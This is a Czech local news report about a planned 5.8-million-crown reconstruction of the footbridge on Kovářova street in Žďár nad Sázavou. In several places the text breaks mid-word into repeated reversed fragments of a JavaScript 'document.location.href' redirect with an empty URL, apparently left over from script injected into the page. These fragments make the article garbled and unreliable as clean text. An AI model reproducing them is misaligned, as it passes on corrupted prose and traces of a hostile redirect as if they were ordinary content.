Rainbow page separator

Most čeká rekonstrukce, chodci i cyklisté budou muset jinudy

Sobota, 16. července 2022

Žďár nad Sázavou / Až v podzimních měsících bude možné procházet po zrekonstruovaném mostu pro pěší a cyklisty v Kovářově ulici, který si v pondělí 11. července převzala stavební firma. Ta v následujících týdnech provede obnovu přemostění, které se již nachází ve špatném technickém stavu, v hodnotě 5,8 milionu korun bez DPH. Vzhledem k výraznému nárůstu cen stavebních materiálů v posledním roce budou stavební práce o více než milion korun dražší, než bylo v roce 2018, kdy se začala oprava frekven[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovaného mostu plánovat, vyčísleno.
Převážně železobe[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tonový most projde odstraněním původního svršku a jeho nahrazením novým, přičemž ponechané konstrukce čeká sanace. I po celkové rekonstrukci bude přemostění nadále určeno výhradně pro potřeby chodců a cyklistů, nikoliv pro provoz mo[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];torových vozidel.